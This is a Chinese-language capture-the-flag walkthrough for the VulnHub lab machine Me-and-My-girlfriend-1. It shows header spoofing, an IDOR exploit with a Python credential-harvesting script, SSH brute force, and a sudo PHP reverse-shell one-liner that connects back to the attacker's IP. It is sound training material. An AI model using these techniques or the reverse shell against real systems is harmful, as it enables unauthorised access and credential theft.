靶机实战-vuluhub系列-Me-and-My-girlfriend-1

简介: 靶机实战-vuluhub系列-Me-and-My-girlfriend-1

靶机下载地址

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

环境搭建

攻击机:192.168.56.102

靶机Me-and-My-girlfriend-1:192.168.56.101

信息收集

扫描局域网内存在的主机(arp-scan)发现靶机IP为192.168.56.101


640.png

端口扫描(nmap)发现开放了22端口和80端口

640.png

漏洞挖掘


尝试爆破22端口(hydra),爆破无果。


b3c73fcbb6fb9ceab6e85d6aef0978a2.png


80端口入手,只能本地才能访问

4701ced53fb452a620c51e38ceb54686.png

使用谷歌插件ModHeader设置X-Forwarded-For为127.0.0.1

X-Forwarded:获得HTTP请求端真实的IP,在代理转发及反向代理中经常使用X-Forwarded-For 字段。


a5b093ecc38773508d8fd0ad340b497d.png

有一个登录页面,尝试万能密码,sql注入。经过测试,不存在万能密码和sql注入。


e681df99612beba825fdbf968a333ac8.png


来到注册功能处,注册一个普通用户,账号密码为admin,邮箱:123@qq.com

b4248a192a03c60a17ecf6ad32f3b617.png

登录进去,观察url,可能存在sql注入和水平越权,测试后发现不存在sql注入,但存在水平越权漏洞。

033a953b4725727388e950aa402eb1d5.png

user_id=1,成功越权到eweuhtandingan用户

d0af32a8357948bd3c5c1a33fc33fa64.png

f12可直接查看用户的密码


fb2ec7e5a9c11618d81ce4c8cb2339b4.png


kali自带工具crunch生成1-999的字典

5d54a3b2eb2c90b30d978ee85c6f074d.png

使用burp进行抓包进行枚举用户

5356a17432981315c231410a195a6c0b.png

存在用户1,2,3,4,5,9,12,13

收集账号密码

0937b6e1c89b82297c33a60eb0a114c0.png

也可用python脚本进行用户遍历收集账号密码生成字典文件


import requestsimport re
for user_id in range(1,14):    url = "http://192.168.56.101/?page=profile&user_id=" + str(user_id)    #print(url)    headers={        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.106Safari/537.36',        'X-Forwarded-For': '127.0.0.1',        'Cookie': 'PHPSESSID=laj6g176m70i272au6dte5ceq2'    }    r = requests.get(url=url,headers=headers)    r1 = r.text    #print(r1)    if 'username' in r.text:        um=re.findall(r'id="username" value="(.*?)"',r1,re.I | re.M)  #正则匹配账号        um1=[str(i) for i in um]        um2=''.join(um1)        #print(um2)        f = open('账号.txt','a+')        text = f.write(um2+'\n')    if 'password' in r.text:        pd = re.findall(r'id="password" value="(.*?)"',r1,re.I | re.M) #正则匹配密码        pd1 = [str(i) for i in pd]        pd2 = ''.join(pd1)        f = open('密码.txt','a+')        text1 = f.write(pd2+'\n')

运行脚本会生成账号.txt和密码.txt的字典文件

5bfc4e5121b79a3675d265406e7e66be.png

爆破22端口(超级弱口令检查工具),成功爆破出ssh账号密码:alice/4lic3

a3047c8f8966583284a2790934bf9d43.png

成功连接ssh,在网站根目录下发现数据库连接的文件,里面有数据库的账号和密码

a20dc554a33be02a859b14cf6e4fc9e1.png

连接数据库进行查看

79c9cf6374e5c3225dd2357c7c0e0f2f.png


6256c58cf333fe3346368f721224f818.png

ls -la查看隐藏文件或隐藏目录,在.my_secret隐藏目录下发现flag1

28dd35b0a78df0b37d010bce2d0e1650.png

提权(sudo提权)

1、只能使用上面数据库的账号密码:root/ctf_pasti_bisa

b79c4e5b285870fff192301ad212b889.png

使用su 进行登录得到flag2


4f60582c6f814ba69ddcedfe735bf5e0.png


2、sudo -l查看特权用户,发现php是root权限

06f65a3daf86b8f706efc59331ea8019.png

在靶机的 alice 用户下创建一个 PHP 反弹 shell,指定 Kali 的 IP 和监听的端口,回车之后即可反弹 shell


sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.102",7777);exec("/bin/bash -i <&3 >&3 2>&3");'

7bb5897f7a27d78551b6680755892d74.png

成功提权拿到flag2




相关文章
|
7月前
|
网络协议 Shell 网络安全
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
这是一篇关于网络安全攻防的详细分析文章,主要讲述了新手如何通过VulnHub靶场中的MoneyBox:1来学习渗透测试的过程。文章首先介绍了环境配置,包括导入虚拟机和网络设置。接着,通过nmap工具扫描目标IP,发现了FTP服务和SSH服务。通过dirsearch工具爆破FTP服务,获取了用户名renu和密码987654321。使用该信息登录FTP,找到了一个提示性的图片,通过steghide工具发现了一个隐藏的数据文件,并通过SSH公钥验证登录
181 1
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
7月前
|
XML 存储 安全
w1r3s 靶机学习
w1r3s 靶机学习
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
115 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
137 1
VulnHub靶机DC3渗透笔记
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
SQL 网络协议 安全
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1
|
安全 Shell 网络安全
Vulnhub-Gigachad靶机复现(二)
Vulnhub-Gigachad靶机复现
151 0
Vulnhub-Gigachad靶机复现(二)
|
网络安全 数据安全/隐私保护
Vulnhub-Gigachad靶机复现(一)
Vulnhub-Gigachad靶机复现
157 0
Vulnhub-Gigachad靶机复现(一)
|
Shell Apache 数据库
Vulnhub靶场之Me-and-My-Girlfriend(二)
Vulnhub靶场之Me-and-My-Girlfriend
131 0
Vulnhub靶场之Me-and-My-Girlfriend(二)